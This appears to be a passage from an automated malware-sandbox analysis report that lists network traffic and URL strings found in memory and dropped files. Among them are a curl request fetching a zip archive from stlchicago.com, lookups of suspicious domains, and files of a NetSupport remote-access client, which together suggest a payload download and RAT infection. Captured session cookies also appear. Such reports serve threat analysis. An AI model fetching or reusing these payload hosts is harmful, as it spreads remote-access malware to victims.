Source: global traffic HTTP traffic detected: GET /rp/lyORKltpug50ELqZ5ptEKcTB5EQ.br.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: gzip, deflate, bruser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=22cef22c&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rabu.zip??56cfb29adde612865acb HTTP/1.1Host: www.stlchicago.comUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: NID=524=XQ8vO7qgDY4xZCkZKIhi0FxhO55QtBLxj9sncjQzjvGtkq2ctgvOkBEr7js2tfxiGwyhzXutM7TTtZ1gHYSaOr_ptYNJD3PF9enrgoA0nh7uvKFGXGqrHWwG3ZrsND9Y_eil2DFr6TbANtaSoH_1ig89fqmYO5cy1QuPnXzwMKUXuVr4UUTDRGZFADFHmHeNI-nYFVQpriority: u=4, i
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com_KEY equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: =https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: >6https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: E=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( ( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/cspreport equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/cspreportframe equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX$ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR34"7 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmin.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.css equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.csseHandleror equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: tTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2624436825.0000742402092000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2257928889.0000742402CE7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1694261859.0000742402578000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2624436825.0000742402092000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2421538935.0000742401ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2418860091.00007424016CB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.com@x equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: www.youtube.comtTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: fountainofhealth.ca
Source: global traffic DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic DNS traffic detected: DNS query: 3dmaine.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global traffic DNS traffic detected: DNS query: i.ytimg.com
Source: global traffic DNS traffic detected: DNS query: kingdomholding.top
Source: global traffic DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: static.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: yt3.ggpht.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: www.stlchicago.com
Source: global traffic DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic DNS traffic detected: DNS query: google.com
Source: global traffic DNS traffic detected: DNS query: e2c12.gcp.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons4.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons5.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons5.gvt3.com
Source: unknown HTTP traffic detected: POST /youtubei/v1/log_event?alt=json HTTP/1.1 host: www.youtube.com content-length: 12121 sec-ch-ua-platform: "Windows" sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 x-youtube-client-name: 56 x-youtube-ad-signals: dt=1748893175463&flash=0&frm=2&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&bc=31&bih=-12245933&biw=-12245933&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C850%2C480&vis=1&wgl=true&ca_type=image x-goog-event-time: 1748893179530 x-youtube-client-version: 1.20250528.22.00 content-type: application/json x-youtube-page-label: youtube.player.web_20250528_22_RC00 x-youtube-page-cl: 764512846 x-youtube-utc-offset: -240 x-youtube-device: cbr=Chrome&cbrver=134.0.0.0&ceng=WebKit&cengver=537.36&cos=Windows&cosver=10.0&cplatform=DESKTOP x-goog-visitor-id: CgtDX2FnWUQxOTVQQSj4-_fBBjIKCgJVUxIEGgAgOg%3D%3D x-goog-request-time: 1748893179530 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 x-youtube-time-zone: America/New_York accept: */* origin: https://www.youtube.com x-client-data: CLbgygE= sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty sec-fetch-storage-access: active referer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 cookie: YSC=VZrzuY-qz_o cookie: __
Source: PCICL32.DLL.31.dr String found in binary or memory: http://127.0.0.1
Source: PCICL32.DLL.31.dr String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: hw.dll.31.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: hw.dll.31.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: client32.exe.31.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: client32.exe.31.dr String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: client32.exe.31.dr String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: client32.exe.31.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: client32.exe.31.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: hw.dll.31.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: adtw.dll1.31.dr, adtw.dll0.31.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: hw.dll.31.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: adtw.dll1.31.dr, adtw.dll0.31.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: hw.dll.31.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hw.dll.31.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: hw.dll.31.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_pa
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhobagln
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmifoiba
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookg
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbj
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbog
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://epscd.catcert.net/crl/ec-acc.crl0.
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://epscd2.catcert.net/crl/ec-acc.crl0
Source: chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://fountainofhealth.ca/
Source: PCICL32.DLL.31.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: PCICL32.DLL.31.dr String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856165285.0000742401CC3000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422598110.0000742401CCC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://jquery.org/license
Source: chrome.exe, 00000000.00000003.1694261859.0000742402578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://jqueryui.com
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://ocsp.catcert.cat0
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000083AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp, pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://ocsp.digicert.com0
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: adtw.dll1.31.dr, hw.dll.31.dr, adtw.dll0.31.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: hw.dll.31.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: adtw.dll1.31.dr, adtw.dll0.31.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000014.00000000.1337084127.0000000008354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008374000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: client32.exe.31.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: client32.exe.31.dr String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: client32.exe.31.dr String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: client32.exe.31.dr String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: hw.dll.31.dr String found in binary or memory: http://ocsp.thawte.com0
Source: client32.exe.31.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: http://s2.symcb.com0
Source: explorer.exe, 00000014.00000000.1329943695.00000000071E0000.00000002.00000001.00040000.00000009.sdmp String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000014.00000000.1345005602.000000000BFF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micros/H
Source: client32.exe.31.dr String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: client32.exe.31.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: client32.exe.31.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: client32.exe.31.dr String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: hw.dll.31.dr String found in binary or memory: http://support.steampowered.com
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: http://sv.symcd.com0&
Source: hw.dll.31.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hw.dll.31.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hw.dll.31.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000014.00000000.1345005602.000000000BE90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1587698138.000000000BEBD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://www.catcert.cat/descarrega/acc.crt0#
Source: hw.dll.31.dr String found in binary or memory: http://www.counter-strike.net/cheat.html
Source: pnf1.dll1.31.dr, adtw.dll1.31.dr, adtw.dll0.31.dr, pnf1.dll0.31.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thir
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhob
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmif
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfimg
Source: PCICL32.DLL.31.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: PCICL32.DLL.31.dr String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: PCICL32.DLL.31.dr String found in binary or memory: http://www.pci.co.uk/support
Source: PCICL32.DLL.31.dr String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: explorer.exe, 00000014.00000003.1587698138.000000000BF28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2020018194.000000000BF28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000014.00000000.1343526292.000000000B9EF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppsf
